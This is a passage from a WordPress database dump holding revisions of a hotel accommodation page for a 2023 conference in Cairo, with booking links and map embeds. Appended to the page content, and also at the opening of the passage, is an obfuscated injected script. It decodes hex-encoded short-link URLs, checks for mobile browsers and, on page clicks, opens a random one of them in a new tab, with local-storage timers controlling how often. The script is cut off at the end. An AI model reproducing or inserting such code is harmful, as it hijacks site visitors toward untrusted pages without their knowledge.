_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:04:14','2023-07-18 23:04:14','',2685,'https://gsw2023.com/?p=5022',0,'revision','',0),
(5023,1,'2023-07-18 23:05:19','2023-07-18 23:05:19','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 